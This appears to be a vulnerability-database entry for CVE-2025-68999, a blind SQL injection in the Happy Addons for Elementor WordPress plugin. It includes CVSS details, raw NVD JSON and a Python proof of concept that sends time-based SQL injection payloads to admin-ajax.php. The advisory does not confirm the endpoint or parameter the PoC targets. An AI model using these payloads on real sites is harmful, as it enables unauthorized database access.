Security Vulnerability Report
中文
CVE-2025-68999 CVSS 8.5 HIGH

CVE-2025-68999

Published: 2026-01-22 17:16:16
Last Modified: 2026-04-27 19:16:41

Description

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in HappyMonster Happy Addons for Elementor happy-elementor-addons allows Blind SQL Injection.This issue affects Happy Addons for Elementor: from n/a through <= 3.20.4.

CVSS Details

CVSS Score
8.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:L

Configurations (Affected Products)

No configuration data available.

Happy Addons for Elementor <= 3.20.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import time # CVE-2025-68999 PoC - Happy Addons for Elementor Blind SQL Injection # Target: WordPress site with Happy Addons for Elementor plugin <= 3.20.4 target_url = "http://target-site.com/wp-admin/admin-ajax.php" def blind_sql_injection_test(): """ Test for CVE-2025-68999 Blind SQL Injection vulnerability The vulnerability exists in the happy-elementor-addons plugin """ headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)", "Content-Type": "application/x-www-form-urlencoded" } # Payload to test boolean-based blind SQL injection # Modify the 'id' parameter with SQL injection payload true_payload = "1' AND 1=1 -- -" false_payload = "1' AND 1=2 -- -" # Time-based blind SQL injection payload time_payload = "1' AND IF(1=1, SLEEP(5), 0) -- -" print("[*] Testing CVE-2025-68999 Blind SQL Injection...") print(f"[*] Target: {target_url}") # Test with normal request first normal_data = { "action": "happy_get_post_grid_filter", "id": "1" } start = time.time() try: response = requests.post(target_url, data=normal_data, headers=headers, timeout=10) normal_time = time.time() - start print(f"[*] Normal request time: {normal_time:.2f}s") except requests.exceptions.RequestException as e: print(f"[!] Request failed: {e}") return False # Test time-based injection print("[*] Testing time-based blind SQL injection...") time_data = { "action": "happy_get_post_grid_filter", "id": time_payload } start = time.time() try: response = requests.post(target_url, data=time_data, headers=headers, timeout=30) injection_time = time.time() - start print(f"[*] Time-based injection request time: {injection_time:.2f}s") if injection_time > 4: print("[+] Vulnerability confirmed! Time-based blind SQL injection works.") return True except requests.exceptions.Timeout: print("[+] Vulnerability confirmed! Request timed out as expected.") return True except requests.exceptions.RequestException as e: print(f"[!] Request failed: {e}") print("[-] Vulnerability not detected or target may be patched.") return False if __name__ == "__main__": blind_sql_injection_test()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68999", "sourceIdentifier": "[email protected]", "published": "2026-01-22T17:16:15.627", "lastModified": "2026-04-27T19:16:41.147", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in HappyMonster Happy Addons for Elementor happy-elementor-addons allows Blind SQL Injection.This issue affects Happy Addons for Elementor: from n/a through <= 3.20.4."}, {"lang": "es", "value": "Vulnerabilidad de neutralización incorrecta de elementos especiales utilizados en un comando SQL ('inyección SQL') en HappyMonster Happy Addons para Elementor happy-elementor-addons permite inyección SQL ciega. Este problema afecta a Happy Addons para Elementor: desde n/a hasta &lt;= 3.20.4."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:L", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.1, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/happy-elementor-addons/vulnerability/wordpress-happy-addons-for-elementor-plugin-3-20-4-sql-injection-vulnerability?_s_id=cve", "source": "[email protected]"}]}}